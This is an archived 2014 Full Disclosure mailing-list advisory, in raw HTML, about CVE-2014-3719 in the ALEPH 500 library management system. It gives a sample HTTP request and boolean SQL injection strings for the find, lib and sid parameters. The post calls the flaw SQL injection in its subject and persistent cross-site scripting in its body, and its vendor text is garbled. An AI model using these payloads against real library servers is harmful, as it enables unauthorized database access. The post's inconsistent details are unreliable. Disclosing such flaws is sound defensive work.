[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CVE-2014-3719] ALEPH500 (Integrated library management system) SQL Injection
- To: "fulldisclosure"<fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] [CVE-2014-3719] ALEPH500 (Integrated library management system) SQL Injection
- From: "shady.liu"<shady.liu@xxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 15 May 2014 16:30:38 +0800
<div style="font:14px/1.5 'Lucida Grande', '微软雅黑';color:#333;"><p
style="line-height: 1.5; margin: 0px;"><span style="color: rgb(0, 0, 0);
line-height: normal;"><font face="Lucida Grande">Greetings:</font></span></p><p
style="line-height: 1.5; margin: 0px;"><span style="color: rgb(0, 0, 0);
font-size: 13px; line-height: normal;"><font face="Lucida
Grande"><br></font></span></p><p style="line-height: 1.5; margin: 0px;"><span
style="color: rgb(0, 0, 0); font-size: 13px; line-height: normal;"><font
face="Lucida Grande"><br></font></span></p><p style="line-height: 1.5; margin:
0px;"><font face="Lucida Grande"> I found on
a </font>ALEPH500 (Integrated library management system) Cross Site
Scripting<font face="Lucida Grande">;CVE-ID is CVE-2014-3719.</font></p><p
style="line-height: 1.5; margin: 0px;"><font face="Lucida
Grande"><br></font></p><p style="line-height: 1.5; margin: 0px;"><font
face="Lucida Grande"><br></font></p><p style="line-height: 1.5; margin:
0px;"><font face="Lucida Grande"><span left-pos="0|9" right-pos="0|9" space=""
class="" style="line-height: 22px;">Aleph 500</span><span left-pos="9|3"
right-pos="9|3" space="" style="line-height: 22px;">,</span><span
left-pos="12|12" right-pos="12|12" space="0| " style="line-height:
22px;"> fully meet the</span><span left-pos="24|12" right-pos="24|12"
space="0| " style="line-height: 22px;"> industry standard</span><span
left-pos="36|3" right-pos="36|3" space="" style="line-height:
22px;">,</span><span left-pos="39|3" right-pos="39|3" space="0| "
style="line-height: 22px;"> is</span><span left-pos="42|6,57|9"
right-pos="42|6,57|9" space="0| " style="line-height: 22px;"> an art
class</span><span left-pos="48|9" right-pos="48|9" space="0| "
style="line-height: 22px;"> perfect</span><span left-pos="66|12"
right-pos="66|12" space="0| " style="line-height:
22px;"> library</span><span left-pos="78|12" right-pos="78|12" space="0| "
class="" style="line-height: 22px;">solution</span><span left-pos="90|3"
right-pos="90|3" space="" style="line-height: 22px;">,</span><span
left-pos="93|9" right-pos="93|9" space="0| " style="line-height:
22px;"> the</span><span left-pos="102|2" right-pos="102|2" space="0| "
style="line-height: 22px;"> Ex</span><span left-pos="105|18"
right-pos="105|18" space="0| " style="line-height: 22px;"> Libris to
pursue the</span><span left-pos="138|12" right-pos="138|12" space="0| "
style="line-height: 22px;"> essence of philosophy</span><span
left-pos="123|12" right-pos="123|12" space="0| " class="" style="line-height:
22px;"> is flexible and easy to use</span><span left-pos="150|3"
right-pos="150|3" space="" style="line-height: 22px;">.</span><span
left-pos="153|2" right-pos="153|2" space="0| " style="line-height:
22px;"> Ex</span><span left-pos="156|6" right-pos="156|6" space="0| "
style="line-height: 22px;"> Libris</span><span left-pos="162|3,225|15"
right-pos="162|3,225|15" space="0| " style="line-height: 22px;"> is the
world leader in</span><span left-pos="216|6" right-pos="216|6" space="0| "
style="line-height: 22px;"> the field</span><span left-pos="165|18"
right-pos="165|18" space="0| " class="" style="line-height: 22px;"> of
Library and information</span><span left-pos="183|6" right-pos="183|6"
space="0| " style="line-height: 22px;"> center of</span><span
left-pos="210|6" right-pos="210|6" space="0| " style="line-height:
22px;"> development of</span><span left-pos="189|9" right-pos="189|9"
space="0| " style="line-height: 22px;"> high performance</span><span
left-pos="198|12,222|3" right-pos="198|12,222|3" space="0| "
style="line-height: 22px;"> application system</span><span
left-pos="240|3" right-pos="240|3" space="" style="line-height:
22px;">.</span><span left-pos="243|9" right-pos="243|9" space="0| " class=""
style="line-height: 22px;">Aleph 500</span><span left-pos="252|3"
right-pos="252|3" space="" style="line-height: 22px;">,</span><span
left-pos="255|21" right-pos="255|21" space="0| " class="" style="line-height:
22px;"> with Oracle database as a</span><span left-pos="276|6"
right-pos="276|6" space="0| " style="line-height:
22px;"> background</span><span left-pos="282|3" right-pos="282|3" space=""
style="line-height: 22px;">,</span><span left-pos="285|19" right-pos="285|19"
space="0| " style="line-height: 22px;"> fully support the
Unicode</span><span left-pos="304|9" right-pos="304|9" space="0| " class=""
style="line-height: 22px;">charact</span><span left-pos="304|9"
right-pos="304|9" space="0| " class="" style="line-height: 22px;">er
set</span><span left-pos="313|3" right-pos="313|3" space="" style="line-height:
22px;">,</span><span left-pos="316|9" right-pos="316|9" space="0| " class=""
style="line-height: 22px;"> support XML</span><span left-pos="325|12"
right-pos="325|12" space="0| " style="line-height: 22px;"> management
report</span><span left-pos="337|3" right-pos="337|3" space=""
style="line-height: 22px;">,</span><span left-pos="340|6" right-pos="340|6"
space="0| " style="line-height: 22px;"> and</span><span left-pos="346|15"
right-pos="346|15" space="0| " style="line-height: 22px;"> links to
other</span><span left-pos="361|12" right-pos="361|12" space="0| "
style="line-height: 22px;"> top application</span><span left-pos="373|12"
right-pos="373|12" space="0| " class="" style="line-height: 22px;"> system
of API</span><span left-pos="385|3" right-pos="385|3" space=""
style="line-height: 22px;">,</span><span left-pos="388|3,418|6"
right-pos="388|3,418|6" space="0| " style="line-height: 22px;"> is a
pioneer in</span><span left-pos="391|27" right-pos="391|27" space="0| "
style="line-height: 22px;"> the field of Library automation</span><span
left-pos="424|3" right-pos="424|3" space="" style="line-height:
22px;">.</span><span left-pos="427|15" right-pos="427|15" space="0| " class=""
style="line-height: 22px;">With more than 20</span><span left-pos="442|18"
right-pos="442|18" space="0| " style="line-height: 22px;"> years of
development experience</span><span left-pos="460|3" right-pos="460|3" space=""
style="line-height: 22px;">,</span><span left-pos="463|6" right-pos="463|6"
space="0| " style="line-height: 22px;"> through the</span><span
left-pos="486|6,469|6" right-pos="486|6,469|6" space="0| " class=""
style="line-height: 22px;"> design of the four generation</span><span
left-pos="475|11" right-pos="475|11" space="0| " class="" style="line-height:
22px;"> Aleph system</span><span left-pos="492|3" right-pos="492|3"
space="" style="line-height: 22px;">,</span><span left-pos="495|2"
right-pos="495|2" space="0| " style="line-height: 22px;"> Ex</span><span
left-pos="498|12" right-pos="498|12" space="0| " style="line-height:
22px;"> Libris is already</span><span left-pos="510|18" right-pos="510|18"
space="0| " style="line-height: 22px;"> in the world</span><span
left-pos="528|9" right-pos="528|9" space="0| " style="line-height:
22px;"> won</span><span left-pos="537|6" right-pos="537|6" space="0| "
style="line-height: 22px;"> a number of</span><span left-pos="543|15"
right-pos="543|15" space="0| " class="" style="line-height: 22px;"> loyal
customers</span><span left-pos="558|3" right-pos="558|3" space=""
style="line-height: 22px;">,</span><span left-pos="561|9" right-pos="561|9"
space="0| " style="line-height: 22px;"> at present,</span><span
left-pos="570|16" right-pos="570|16" space="0| " style="line-height:
22px;"> there are already more than 1</span><span left-pos="570|16"
right-pos="570|16" space="0| " style="line-height: 22px;">250</span><span
left-pos="586|8" right-pos="586|8" space="0| " style="line-height: 22px;">sets
of Aleph</span><span left-pos="594|15" right-pos="594|15" space="0| " class=""
style="line-height: 22px;"> system was installed in</span><span
left-pos="609|20" right-pos="609|20" space="0| " style="line-height:
22px;"> 51 countries and regions</span><span left-pos="629|3"
right-pos="629|3" space="0| " style="line-height: 22px;"> of
the</span><span left-pos="632|9" right-pos="632|9" space="0| "
style="line-height: 22px;"> library</span><span left-pos="641|6"
right-pos="641|6" space="0| " style="line-height: 22px;">and</span><span
left-pos="647|3" right-pos="647|3" space="0| " style="line-height:
22px;"> Museum</span><span left-pos="650|15" right-pos="650|15" space="0|
" class="" style="line-height: 22px;"> within the coalition</span><span
left-pos="665|3" right-pos="665|3" space="" class="" style="line-height:
22px;">.</span><br></font></p><div><span left-pos="148|3" right-pos="148|3"
space="" style="line-height: 22px;"><font face="Lucida
Grande"><br></font></span></div><div><span left-pos="148|3" right-pos="148|3"
space="" style="line-height: 22px;"><font face="Lucida Grande"><div class="line
number14 index13 alt1"><code class="text plain">Software
Description</code></div><div class="line number15 index14 alt2"><code
class="text
plain">=====================</code></div></font></span></div><div><font
face="Lucida Grande"><span left-pos="0|19" right-pos="0|19" space="" class=""
style="line-height: 22px;">The Aleph 500 system is</span><span left-pos="19|6"
right-pos="19|6" space="0| " style="line-height: 22px;"> a set
of</span><span left-pos="25|15" right-pos="25|15" space="0| "
style="line-height: 22px;"> functional integrity of the</span><span
left-pos="40|30" right-pos="40|30" space="0| " class="" style="line-height:
22px;"> integrated library automation system</span><span left-pos="70|3"
right-pos="70|3" space="" style="line-height: 22px;">,</span><span
left-pos="73|3" right-pos="73|3" space="0| " style="line-height:
22px;"> is</span><span left-pos="76|11" right-pos="76|11" space="0| "
style="line-height: 22px;"> Israel's Ex</span><span left-pos="88|6"
right-pos="88|6" space="0| " style="line-height:
22px;"> Libris</span><span left-pos="94|3" right-pos="94|3" space="0| "
style="line-height: 22px;"> (</span><span left-pos="97|24"
right-pos="97|24" space="0| " style="line-height: 22px;">Eli Beth
Co.</span><span left-pos="121|3" right-pos="121|3" space="0| "
style="line-height: 22px;">)</span><span left-pos="124|18" right-pos="124|18"
space="0| " class="" style="line-height: 22px;"> developed the fifth
generation of</span><span left-pos="142|6" right-pos="142|6" space="0| "
class="" style="line-height: 22px;"> products</span><span left-pos="148|3"
right-pos="148|3" space="" style="line-height:
22px;">.</span></font></div><div><span left-pos="148|3" right-pos="148|3"
space="" style="line-height: 22px;"><font face="Lucida
Grande"><br></font></span></div><div><span left-pos="148|3" right-pos="148|3"
space="" style="line-height: 22px;"><font face="Lucida
Grande"><br></font></span></div><div><span left-pos="148|3" right-pos="148|3"
space=""><font face="Lucida Grande"><div class="line number21 index20 alt2"
style="line-height: 22px;"><code class="text plain">Vulnerability
Description</code></div><div class="line number22 index21 alt1"
style="line-height: 22px;"><code class="text
plain">=========================</code></div><div class="line number23 index22
alt2" style="line-height: 22px;"><code class="text plain"><div class="line
number23 index22 alt2"><font face="Lucida Grande">Vulnerability
title: <span style="color: rgb(0, 0, 0); white-space: pre-wrap;">Multiple
Persistent Cross Site Scripting </span><span style="line-height: 21px;">ALEPH
500 </span></font><span style="font-family: 'Lucida
Grande';">(CVE-2014-3719)</span></div><div class="line number23 index22
alt2"><font face="Lucida Grande">CVE: CVE-2014-3719</font></div><div
class="line number23 index22 alt2"><font face="Lucida Grande">Vendor:
Israeli Ex Libris (Eli Beth Co.) development</font></div><div class="line
number23 index22 alt2"><font face="Lucida Grande">Product: Israeli Ex
Libris (Eli Beth Co.) development ALEPH500 (Integrated library management
system)</font></div><div class="line number23 index22 alt2"><font face="Lucida
Grande">Affected version: 18.1、 20</font></div><div class="line number23
index22 alt2"><font face="Lucida Grande">Fixed version: ALEPH
500</font></div><div class="line number23 index22 alt2"><font face="Lucida
Grande">Author: Shady.liu</font></div><div class="line number23 index22
alt2"><font face="Lucida Grande">URL: http://[domain]/</font><span
style="font-family: 'Lucida Grande'; line-height:
normal;">cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000</span></div><p
style="font-family: 'Lucida Grande', 微软雅黑; margin: 0px; line-height:
normal;"><font face="Lucida Grande">Andz</font></p><div class="line number23
index22 alt2"><font face="Lucida Grande">Affected parameter(s):
find、lib、sid</font></div></code></div></font></span></div><div><font
face="Lucida Grande"><br></font></div><div><font face="Lucida Grande">HTTP
REQUEST</font></div><div><p style="margin: 0px; line-height: normal;"><font
face="Lucida Grande"><font size="1"> </font>GET</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">/cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida Grande">Andz
HTTP/1.1</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">X-Requested-With: XMLHttpRequest</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">Referer:</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">http://host:8991/F?func=find-m&find_code=WTI&FIND_BASE=BGD09&FIND_BASE=B</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">GD01&FIND_BASE=BGD03&FIND_BASE=BGD07&request=</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida Grande">Host:
host:8991</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">Connection: Keep-alive</font></p>
<p style="margin: 0px; line-height: normal;"><font face="Lucida
Grande">Accept-Encoding: gzip,deflate</font></p>
<p style="margin: 0px; line-height: normal;"><br></p></div><div><font
face="Lucida Grande"><br></font></div><div><font face="Lucida Grande">Replace
“find、lib、sid" parameter value with “' AND 6012=6012 AND
'SM'='SM</font><span style="line-height: 1.5; font-family: 'Lucida
Grande';">”</span></div><div><span style="line-height: 1.5;"><font face="Lucida
Grande"><br></font></span></div><div><font face="Lucida Grande">Tools used:
Mozilla Firefox browser</font></div><div><span style="line-height: 1.5;"><font
face="Lucida Grande"><br></font></span></div><div><font face="Lucida
Grande"><br></font></div><div><div style="font-style: normal; font-variant:
normal; font-weight: normal; font-size: 14px; line-height: 1.5;"><div
style="font-size: 13px; line-height: normal; orphans: 2; widows: 2; word-wrap:
break-word; -webkit-nbsp-mode: space; -webkit-line-break:
after-white-space;"><font face="Lucida Grande"><br></font></div><div
style="font-size: 13px; line-height: normal; orphans: 2; widows: 2; word-wrap:
break-word; -webkit-nbsp-mode: space; -webkit-line-break:
after-white-space;"><font face="Lucida Grande">CISP COBIT OWASP
ITIL<br><br>DBAppSecurity
Co.Ltd.<br>-------------------------------------------------------------------------<br><br></font></div><div
style="font-size: 13px; line-height: normal; orphans: 2; widows: 2; word-wrap:
break-word; -webkit-nbsp-mode: space; -webkit-line-break:
after-white-space;"><font face="Lucida
Grande">Email:Shady.liu@xxxxxxxxxxxxxxxxxxxx<br>----------------------------------------------------------</font></div></div></div></div>
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/